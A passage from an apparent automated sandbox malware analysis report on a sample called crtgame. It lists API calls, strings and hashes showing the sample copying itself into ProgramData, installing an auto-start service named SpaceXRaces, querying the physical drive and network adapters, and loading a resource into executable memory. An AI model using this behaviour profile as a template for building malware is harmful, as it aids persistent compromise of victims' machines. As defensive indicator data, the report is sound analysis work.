                                                                          • Opcode ID: 803341d37248f940fd6434f59c57290a4552a2c8ba3ceefaceaf479661161746
                                                                          • Instruction ID: 49dc81ac6bcf3fd683536614608e289c009f5af55911e209b1bd681bcac14ea3
                                                                          • Opcode Fuzzy Hash: 803341d37248f940fd6434f59c57290a4552a2c8ba3ceefaceaf479661161746
                                                                          • Instruction Fuzzy Hash: 4B5131B1940209BFEB10DBA09E49FAE7BBCEB04345F104076F606F21E1D7789D148B69

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(00000000,?,00000104,?,?,?,00000000,7591F360,00000000), ref: 00402582
                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,?,?,00000000,7591F360,00000000), ref: 00402589
                                                                          • GetModuleHandleA.KERNEL32(00000000,00000208,?,?,?,?,?,?,?,?,?,?,?,?,00000000,7591F360), ref: 004025EA
                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,7591F360,00000000), ref: 004025F1
                                                                          • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,00000001,?), ref: 00402608
                                                                          • RegQueryValueExA.KERNELBASE(?,Common AppData,00000000,00000001,C:\ProgramData\SpaceXRaces\SpaceXRaces.exe,?), ref: 00402632
                                                                          • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,7591F360,00000000), ref: 00402643
                                                                          • CreateDirectoryA.KERNELBASE(C:\ProgramData\SpaceXRaces\SpaceXRaces.exe,00000000), ref: 00402665
                                                                          • CopyFileA.KERNEL32(?,C:\ProgramData\SpaceXRaces\SpaceXRaces.exe,00000000), ref: 00402694
                                                                          • OpenSCManagerA.ADVAPI32(00000000,00000000,00000002), ref: 004026A2
                                                                          • CreateServiceA.ADVAPI32(00000000,SpaceXRaces,SpaceXRaces,000F01FF,00000010,00000002,00000001,C:\ProgramData\SpaceXRaces\SpaceXRaces.exe,00000000,00000000,00000000,00000000,00000000), ref: 004026C3
                                                                          • CloseServiceHandle.ADVAPI32(00000000), ref: 004026D0
                                                                          • CloseServiceHandle.ADVAPI32(00000000), ref: 004026E4
                                                                          • CloseServiceHandle.ADVAPI32(00000000), ref: 004026E9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2069129577.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2069129577.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                          Similarity
                                                                          • API ID: Handle$CloseModuleService$File$CreateNameOpen$CopyDirectoryManagerQueryValue
                                                                          • String ID: .exe$C:\ProgramData\SpaceXRaces\SpaceXRaces.exe$Common AppData$Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders$SpaceXRaces
                                                                          • API String ID: 3461818117-4011302265
                                                                          • Opcode ID: e4531a07c198f35eececefb098e8f84c19a8225dec0d5426053034b5013efb8f
                                                                          • Instruction ID: a3d5b12e1f90bb5d6e2ef9e639674f7dcae6e36a2f4b11c7066e8bc7fc52f7b9
                                                                          • Opcode Fuzzy Hash: e4531a07c198f35eececefb098e8f84c19a8225dec0d5426053034b5013efb8f
                                                                          • Instruction Fuzzy Hash: 264193B1940108BBEB20ABA1DE4EE9F3A6CEF41749F00043AF601B11D2D7BD5D508A7D

                                                                          Control-flow Graph

                                                                          • Control-flow graph image not preserved; basic blocks 401b54-401c2e, calling LoadLibraryA, GetProcAddress, GetAdaptersInfo and FreeLibrary
                                                                          APIs
                                                                          • LoadLibraryA.KERNELBASE(iphlpapi.dll), ref: 00401B66
                                                                          • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 00401B7D
                                                                          • GetAdaptersInfo.IPHLPAPI(?,00000400,00000000,00000000,00000000), ref: 00401BA6
                                                                          • FreeLibrary.KERNEL32(00401A3E), ref: 00401C24
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2069129577.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2069129577.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                          Similarity
                                                                          • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                                          • String ID: GetAdaptersInfo$iphlpapi.dll$o
                                                                          • API String ID: 514930453-3667123677
                                                                          • Opcode ID: a9615e917c7d8da21abece12906e102e054d7a7f96f05c26df3a9cf8b4b55db1
                                                                          • Instruction ID: 19d1f7c7220f150a124496b0f3bded62544c7fcf715814b2fda3adae34ef3130
                                                                          • Opcode Fuzzy Hash: a9615e917c7d8da21abece12906e102e054d7a7f96f05c26df3a9cf8b4b55db1
                                                                          • Instruction Fuzzy Hash: 9D21B870944209AFEF21DFA5C9447EFBBB4EF45344F0440BAE504B22E1E7789A85CB69

                                                                          Control-flow Graph

                                                                          • Control-flow graph image not preserved; basic blocks 401a58-401b53, calling CreateFileA, DeviceIoControl, GetLastError and CloseHandle
                                                                          APIs
                                                                          • CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000,00000000), ref: 00401A74
                                                                          • DeviceIoControl.KERNELBASE(?,002D1400,?,0000000C,?,00000400,00000400,00000000), ref: 00401ABB
                                                                          • GetLastError.KERNEL32 ref: 00401B17
                                                                          • CloseHandle.KERNELBASE(?), ref: 00401B46
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2069129577.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2069129577.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                          Similarity
                                                                          • API ID: CloseControlCreateDeviceErrorFileHandleLast
                                                                          • String ID: \\.\PhysicalDrive0
                                                                          • API String ID: 4026078076-1180397377
                                                                          • Opcode ID: 4b276423cefb6535b93749f4a35407bbc40f2b1ddf316d430708a30b7fc217e3
                                                                          • Instruction ID: 2ab55ed144571c3fa2fc985b9ad89e39486dc60e53794fabb09e903d28ee3d3f
                                                                          • Opcode Fuzzy Hash: 4b276423cefb6535b93749f4a35407bbc40f2b1ddf316d430708a30b7fc217e3
                                                                          • Instruction Fuzzy Hash: 9E317A71D00118AADB21EF96CD849EFBBB9EF40750F20817AE515B22A0E3785E45CF98

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetVersion.KERNEL32 ref: 00402F98
                                                                            • Part of subcall function 004032AA: HeapCreate.KERNELBASE(00000000,00001000,00000000,00402FD1,00000000), ref: 004032BB
                                                                            • Part of subcall function 004032AA: HeapDestroy.KERNEL32 ref: 004032FA
                                                                          • GetCommandLineA.KERNEL32 ref: 00402FE6
                                                                          • GetStartupInfoA.KERNEL32(?), ref: 00403011
                                                                          • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00403034
                                                                            • Part of subcall function 0040308D: ExitProcess.KERNEL32 ref: 004030AA
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2069129577.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2069129577.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
                                                                          • String ID:
                                                                          • API String ID: 2057626494-0
                                                                          • Opcode ID: 6973291a08a62e7008eca22fd321bc7397b23a4f1d73c5b2d439b14b6e22de47
                                                                          • Instruction ID: 67841cd3009d396f381f20147254ff52d2e2d79fbc7827c85a5f588a1a3baf3d
                                                                          • Opcode Fuzzy Hash: 6973291a08a62e7008eca22fd321bc7397b23a4f1d73c5b2d439b14b6e22de47
                                                                          • Instruction Fuzzy Hash: 24217FB1800714AADB04AFA6DD0AA6E7BB9EB45704F10413EFA05BB2D1DB384850CB59

                                                                          Control-flow Graph

                                                                          • Control-flow graph image not preserved; basic blocks 401c5b-401cbc, calling GetWindowsDirectoryA, CreateFileA, GetFileTime and CloseHandle
                                                                          APIs
                                                                          • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00401C74
                                                                          • CreateFileA.KERNELBASE(?,00100000,00000007,00000000,00000003,02000000,00000000), ref: 00401C95
                                                                          • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00401CA8
                                                                          • CloseHandle.KERNEL32(00000000), ref: 00401CB1
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2069129577.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2069129577.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                          Similarity
                                                                          • API ID: File$CloseCreateDirectoryHandleTimeWindows
                                                                          • String ID:
                                                                          • API String ID: 87451460-0
                                                                          • Opcode ID: e2397ba6e5c18c7e638a70f9a661d1ac9407ea32cfd96cdb9d4eb31bc9736a0d
                                                                          • Instruction ID: cc4b8a8173e68006100f6bb5cfe5cbca554eec38252bcd741f722b6c7c402e1e
                                                                          • Opcode Fuzzy Hash: e2397ba6e5c18c7e638a70f9a661d1ac9407ea32cfd96cdb9d4eb31bc9736a0d
                                                                          • Instruction Fuzzy Hash: 7CF0E27668021077E6209B359E8DFCB3AAD9BC6B60F010134BB46F21D0D6B49551C6B4

                                                                          Control-flow Graph

                                                                          • Control-flow graph image not preserved; basic blocks 4041cb-404263, calling GetCurrentProcess, TerminateProcess and ExitProcess
                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32(?,?,004041B6,?,00000000,00000000,00403049,00000000,00000000), ref: 004041DB
                                                                          • TerminateProcess.KERNEL32(00000000,?,004041B6,?,00000000,00000000,00403049,00000000,00000000), ref: 004041E2
                                                                          • ExitProcess.KERNEL32 ref: 0040425C
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2069129577.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2069129577.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                          Similarity
                                                                          • API ID: Process$CurrentExitTerminate
                                                                          • String ID:
                                                                          • API String ID: 1703294689-0
                                                                          • Opcode ID: 78841f2a515f296da85e0e90675676ac3a79d5512f1734095c42bbe5f9917e88
                                                                          • Instruction ID: 04da20acb35bf9441239f1d62556dfb4fa7ea4fed694bd47aa7006e356793b78
                                                                          • Opcode Fuzzy Hash: 78841f2a515f296da85e0e90675676ac3a79d5512f1734095c42bbe5f9917e88
                                                                          • Instruction Fuzzy Hash: 8E01D2B2648300DEDA10AF65FE44A0A7BA4FBD4790B10857FF281771E0D739A851CA2E

                                                                          Control-flow Graph

                                                                          • Control-flow graph image not preserved; basic blocks 4032aa-403306, calling HeapCreate and HeapDestroy and subfunctions 403162, 403307 and 403b58
                                                                          APIs
                                                                          • HeapCreate.KERNELBASE(00000000,00001000,00000000,00402FD1,00000000), ref: 004032BB
                                                                            • Part of subcall function 00403162: GetVersionExA.KERNEL32 ref: 00403181
                                                                          • HeapDestroy.KERNEL32 ref: 004032FA
                                                                            • Part of subcall function 00403307: HeapAlloc.KERNEL32(00000000,00000140,004032E3,000003F8), ref: 00403314
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2069129577.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2069129577.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$AllocCreateDestroyVersion
                                                                          • String ID:
                                                                          • API String ID: 2507506473-0
                                                                          • Opcode ID: 0b849b835aecce10534f7c8868f1023d210904a4762ffb57ab141a925f8bfac6
                                                                          • Instruction ID: 5e09d6e980c9b6bd0e9d6ae44655ccf46c8d477683af571ce1b4adb312d05453
                                                                          • Opcode Fuzzy Hash: 0b849b835aecce10534f7c8868f1023d210904a4762ffb57ab141a925f8bfac6
                                                                          • Instruction Fuzzy Hash: C5F065306543019AEB201F309E4AB2A3EA89754757F14483BF841FD1D1EF7D8691950E

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • RegisterServiceCtrlHandlerA.ADVAPI32(SpaceXRaces,Function_000023D3), ref: 00402436
                                                                          • SetServiceStatus.ADVAPI32(0040A058), ref: 00402495
                                                                          • GetLastError.KERNEL32 ref: 00402497
                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 004024A4
                                                                          • GetLastError.KERNEL32 ref: 004024C5
                                                                          • SetServiceStatus.ADVAPI32(0040A058), ref: 004024F5
                                                                          • CreateThread.KERNEL32(00000000,00000000,Function_00002351,00000000,00000000,00000000), ref: 00402501
                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0040250A
                                                                          • CloseHandle.KERNEL32 ref: 00402516
                                                                          • SetServiceStatus.ADVAPI32(0040A058), ref: 0040253F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2069129577.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2069129577.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                          Similarity
                                                                          • API ID: Service$Status$CreateErrorLast$CloseCtrlEventHandleHandlerObjectRegisterSingleThreadWait
                                                                          • String ID: SpaceXRaces
                                                                          • API String ID: 3346042915-182686438
                                                                          • Opcode ID: cdb2bee97ed7bb97cf955b6f798025c993403a3b9e37aa79489956d55700b49b
                                                                          • Instruction ID: 823e7604a9f11b62abb5769871faa090ae10b28c447e591ffcb139ee33df3efb
                                                                          • Opcode Fuzzy Hash: cdb2bee97ed7bb97cf955b6f798025c993403a3b9e37aa79489956d55700b49b
                                                                          • Instruction Fuzzy Hash: F821A9B0841348EBD2119F36FF48E177FA8EB96719715813AE505B22B0C7BA0464DF2E

                                                                          Control-flow Graph

                                                                          • Control-flow graph image not preserved; basic blocks 405b6f-405d8e, calling LCMapStringW, LCMapStringA, MultiByteToWideChar and WideCharToMultiByte
                                                                          APIs
                                                                          • LCMapStringW.KERNEL32(00000000,00000100,004065F4,00000001,00000000,00000000,00000103,00000001,00000000,?,00404EE3,00200020,00000000,?,00000000,00000000), ref: 00405BB1
                                                                          • LCMapStringA.KERNEL32(00000000,00000100,004065F0,00000001,00000000,00000000,?,00404EE3,00200020,00000000,?,00000000,00000000,00000001), ref: 00405BCD
                                                                          • LCMapStringA.KERNEL32(?,?,?,?,N@ ,?,00000103,00000001,00000000,?,00404EE3,00200020,00000000,?,00000000,00000000), ref: 00405C16
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000002,00000000,00200020,00000000,00000000,00000103,00000001,00000000,?,00404EE3,00200020,00000000,?,00000000,00000000), ref: 00405C4E
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00200020,?,00000000,?,00404EE3,00200020,00000000,?,00000000), ref: 00405CA6
                                                                          • LCMapStringW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,00404EE3,00200020,00000000,?,00000000), ref: 00405CBC
                                                                          • LCMapStringW.KERNEL32(?,?,?,00000000,N@ ,?,?,00404EE3,00200020,00000000,?,00000000), ref: 00405CEF
                                                                          • LCMapStringW.KERNEL32(00000000,?,?,?,?,00000000,?,00404EE3,00200020,00000000,?,00000000), ref: 00405D57
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2069129577.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2069129577.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                          Similarity
                                                                          • API ID: String$ByteCharMultiWide
                                                                          • String ID: N@
                                                                          • API String ID: 352835431-2588724849
                                                                          • Opcode ID: 50f7acbb545500e936848391daa4b4f79838f587710a5a8d37350ffe5be9aa75
                                                                          • Instruction ID: 59135ce53bc3b83908b259842d99def5e9dba23692ba7c4f82a52b333c41bde6
                                                                          • Opcode Fuzzy Hash: 50f7acbb545500e936848391daa4b4f79838f587710a5a8d37350ffe5be9aa75
                                                                          • Instruction Fuzzy Hash: 69516B31500609ABDF218F54CD45E9F7BB9EB48710F10813AF912B12A0D33A9961EF69

                                                                          APIs
                                                                          • LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,00404D6D,?,Microsoft Visual C++ Runtime Library,00012010,?,00406528,?,00406578,?,?,?,Runtime Error!Program: ), ref: 004058B9
                                                                          • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 004058D1
                                                                          • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 004058E2
                                                                          • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 004058EF
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2069129577.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2069129577.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$LibraryLoad
                                                                          • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll$xe@
                                                                          • API String ID: 2238633743-4073082454
                                                                          • Opcode ID: ee458f46fe1812a05d91eb71287a3930c9b5d9979fa11f14182ddc6a57f11331
                                                                          • Instruction ID: 33924f41f48bfa595f86144282b4f53d1c2fc39b1daf6c652de04afaa2dac454
                                                                          • Opcode Fuzzy Hash: ee458f46fe1812a05d91eb71287a3930c9b5d9979fa11f14182ddc6a57f11331
                                                                          • Instruction Fuzzy Hash: F4017171640711EFC7109FB5AD8091B3BE8EA887A0712043FA505F23E2DA7988619F2D

                                                                          APIs
                                                                          • GetStringTypeW.KERNEL32(00000001,004065F4,00000001,00000000,00000103,00000001,00000000,00404EE3,00200020,00000000,?,00000000,00000000,00000001), ref: 00405DFD
                                                                          • GetStringTypeA.KERNEL32(00000000,00000001,004065F0,00000001,?,?,00000000,00000000,00000001), ref: 00405E17
                                                                          • GetStringTypeA.KERNEL32(00000000,00000000,?,00000000,00200020,00000103,00000001,00000000,00404EE3,00200020,00000000,?,00000000,00000000,00000001), ref: 00405E4B
                                                                          • MultiByteToWideChar.KERNEL32(N@ ,00000002,?,00000000,00000000,00000000,00000103,00000001,00000000,00404EE3,00200020,00000000,?,00000000,00000000,00000001), ref: 00405E83
                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000001), ref: 00405ED9
                                                                          • GetStringTypeW.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000001), ref: 00405EEB
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2069129577.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2069129577.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                          Similarity
                                                                          • API ID: StringType$ByteCharMultiWide
                                                                          • String ID: N@
                                                                          • API String ID: 3852931651-2588724849
                                                                          • Opcode ID: b846b538efdd308b61092c0b21f0a934ff7444516eeaa1663e1030bce46bb4c8
                                                                          • Instruction ID: efd9f9df0c83a1a94f90d52e1acc00adac850a8b7f95784ade7c71040f2db77a
                                                                          • Opcode Fuzzy Hash: b846b538efdd308b61092c0b21f0a934ff7444516eeaa1663e1030bce46bb4c8
                                                                          • Instruction Fuzzy Hash: 6E414C72900619AFCF209F94DD85EAF7B78FB08750F10443AF912B2290D7398A619B99
                                                                          APIs
                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000), ref: 00404CB6
                                                                          • GetStdHandle.KERNEL32(000000F4,00406528,00000000,?,00000000,00000000), ref: 00404D8C
                                                                          • WriteFile.KERNEL32(00000000), ref: 00404D93
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2069129577.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2069129577.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                          Similarity
                                                                          • API ID: File$HandleModuleNameWrite
                                                                          • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                          • API String ID: 3784150691-4022980321
                                                                          • Opcode ID: 3f183e7b97676ec7bc44c608dee57f0da837cd1f80663b04b7f3573c67123c93
                                                                          • Instruction ID: 66213c8598c100419aca2a23d32cbd7848d5265dc6afe1337dc7fe815477c880
                                                                          • Opcode Fuzzy Hash: 3f183e7b97676ec7bc44c608dee57f0da837cd1f80663b04b7f3573c67123c93
                                                                          • Instruction Fuzzy Hash: 4B31A7B2600218BEEF20EA60DD49FDA376CEF85304F1005BBF545F61D1D6B8AD548A5D
                                                                          APIs
                                                                          • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00402FF6), ref: 0040477B
                                                                          • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00402FF6), ref: 0040478F
                                                                          • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00402FF6), ref: 004047BB
                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00402FF6), ref: 004047F3
                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00402FF6), ref: 00404815
                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,00402FF6), ref: 0040482E
                                                                          • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00402FF6), ref: 00404841
                                                                          • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 0040487F
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2069129577.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2069129577.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                          Similarity
                                                                          • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                                                                          • String ID:
                                                                          • API String ID: 1823725401-0
                                                                          • Opcode ID: 5b86ae991fad7257a9556b843b73270ba3d506a60895f98d1aae2807b58742cd
                                                                          • Instruction ID: d94799acc24e98fca2fbef921ce91b810f6c8713fa78e77f5a065486d65e4eae
                                                                          • Opcode Fuzzy Hash: 5b86ae991fad7257a9556b843b73270ba3d506a60895f98d1aae2807b58742cd
                                                                          • Instruction Fuzzy Hash: CA31F2F75042A55ED7207BB59C8483B76DCE6C5358711893FFA42F3280E6398C4186A9
                                                                          APIs
                                                                          • FindResourceA.KERNEL32(00000000,0000000A,00000000), ref: 00402011
                                                                          • GetLastError.KERNEL32(?,?,?,?,?,004023A6,00000190,00409F34,?,00000000), ref: 0040201D
                                                                          • SizeofResource.KERNEL32(00000000,?,?,?,?,?,004023A6,00000190,00409F34,?,00000000), ref: 0040202A
                                                                          • LoadResource.KERNEL32(00000000,?,?,?,?,?,004023A6,00000190,00409F34,?,00000000), ref: 00402044
                                                                          • LockResource.KERNEL32(00000000,?,?,?,?,?,004023A6,00000190,00409F34,?,00000000), ref: 0040204B
                                                                          • GlobalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,004023A6,00000190,00409F34,?,00000000), ref: 00402056
                                                                          • GetTickCount.KERNEL32 ref: 00402092
                                                                          • GlobalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,?,?,?,004023A6,00000190,00409F34), ref: 004020F8
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2069129577.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2069129577.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                          Similarity
                                                                          • API ID: Resource$AllocGlobal$CountErrorFindLastLoadLockSizeofTick
                                                                          • String ID:
                                                                          • API String ID: 564119183-0
                                                                          • Opcode ID: f1ea5436b47a97949242679e62fd8c16215760983c098ca12679752f31ddac83
                                                                          • Instruction ID: ecab55d02aed30cb2302f8ec7062e98c1eb40003726056bc5c009be87fd8cf01
                                                                          • Opcode Fuzzy Hash: f1ea5436b47a97949242679e62fd8c16215760983c098ca12679752f31ddac83
                                                                          • Instruction Fuzzy Hash: 1C313C71A003456FDF118BB99E88AAF7F78EF49344B10803AFA46F72C1D6748940C768
                                                                          APIs
                                                                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,759230D0,00000000,?,0040238C,00000000,?,00000000), ref: 004021E3
                                                                          • GetLastError.KERNEL32(?,?,?,?,0040238C,00000000), ref: 00402298
                                                                          • LoadLibraryExA.KERNEL32(00000000,00000000,00000000,?,?,?,?,0040238C,00000000), ref: 004022A5
                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 004022E0
                                                                          • Sleep.KERNEL32(000003E8,?,?,?,?,0040238C,00000000), ref: 00402336
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2069129577.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2069129577.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                          Similarity
                                                                          • API ID: AddressAllocErrorLastLibraryLoadProcSleepVirtual
                                                                          • String ID: (
                                                                          • API String ID: 2871813557-3887548279
                                                                          • Opcode ID: 7f0dd8bc027646a7730874866425c3d0ac7d12c98f25a8e59b63077f83e1171d
                                                                          • Instruction ID: fa8a78d08e5b147245ce613c51b7eec45b3ed4bb95c194ee9eab5a02c05580c9
                                                                          • Opcode Fuzzy Hash: 7f0dd8bc027646a7730874866425c3d0ac7d12c98f25a8e59b63077f83e1171d
                                                                          • Instruction Fuzzy Hash: DE516375A00215EFDB14CF98C984BAEB7B5FF44304F2480AAE905AB3C1D7B5EA51CB94
                                                                          APIs
                                                                          • HeapAlloc.KERNEL32(00000000,00002020,?,00000000,?,?,004032F0), ref: 00403B79
                                                                          • VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,00000000,?,?,004032F0), ref: 00403B9D
                                                                          • VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,00000000,?,?,004032F0), ref: 00403BB7
                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?,?,004032F0), ref: 00403C78
                                                                          • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,004032F0), ref: 00403C8F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2069129577.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2069129577.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_crtgame.jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual$FreeHeap
                                                                          • String ID: @q@$@q@
                                                                          • API String ID: 714016831-1591251108
                                                                          • Opcode ID: 53fa90f427eeffaf6ecb660fffee8fa42559a5708230ede92574a81e60caacf4
                                                                          • Instruction ID: 6b7d5d1079877a4fdc04a989ad5d4427692f66b21ec07018b92eff91f37320a0
                                                                          • Opcode Fuzzy Hash: 53fa90f427eeffaf6ecb660fffee8fa42559a5708230ede92574a81e60caacf4
                                                                          • Instruction Fuzzy Hash: 47311071A447019BE3308F28DD49B22BBA8E74475AF00423BE155FB3D1E778B9008B0D
                                                                          APIs
                                                                          • GetVersionExA.KERNEL32 ref: 00403181
                                                                          • GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 004031B6
                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403216
                                                                          Strings
                                                                          Memory Dump Source
